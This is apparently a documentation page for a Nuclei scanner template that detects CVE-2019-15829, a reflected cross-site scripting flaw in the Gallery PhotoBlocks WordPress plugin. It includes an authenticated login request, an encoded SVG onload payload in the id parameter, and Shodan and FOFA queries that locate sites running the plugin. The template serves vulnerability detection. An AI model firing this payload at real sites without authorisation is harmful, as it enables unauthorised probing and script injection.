Gallery Photoblocks < 1.1.43 - Cross-Site Scripting
ID: CVE-2019-15829
Severity: medium
Author: r3Y3r53
Tags: cve,cve2019,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan,greentreelabs
Description
Section titled “Description”The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.
YAML Source
Section titled “YAML Source”id: CVE-2019-15829
info: name: Gallery Photoblocks < 1.1.43 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability. remediation: Fixed in 1.1.43 reference: - https://wpscan.com/vulnerability/b8d1d88e-f2e5-4212-af34-c91f563f07b6/ - https://nvd.nist.gov/vuln/detail/CVE-2019-15829 - https://wordpress.org/plugins/photoblocks-grid-gallery/ - https://wordpress.org/plugins/photoblocks-grid-gallery/#developers - https://wpvulndb.com/vulnerabilities/9443 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2019-15829 cwe-id: CWE-79 epss-score: 0.00146 epss-percentile: 0.50525 cpe: cpe:2.3:a:greentreelabs:gallery_photoblocks:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: greentreelabs product: gallery_photoblocks framework: wordpress shodan-query: http.html:/wp-content/plugins/photoblocks-grid-gallery/ fofa-query: body=/wp-content/plugins/photoblocks-grid-gallery/ publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" tags: cve,cve2019,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan,greentreelabs
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(body_2, "<svg/onload=alert(document.domain)>")' - 'contains(body_2, "post galleries!")' condition: and# digest: 4a0a00473045022000fcaf8d1ba13290f53e39a6fad734268b9d3a402895bdfab513f1ab290e2eca0221009ffcdf38940ff2f2c916c45838b66cc1ae567ba8a2d2272cab01d6dc91f49057:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-15829.yaml"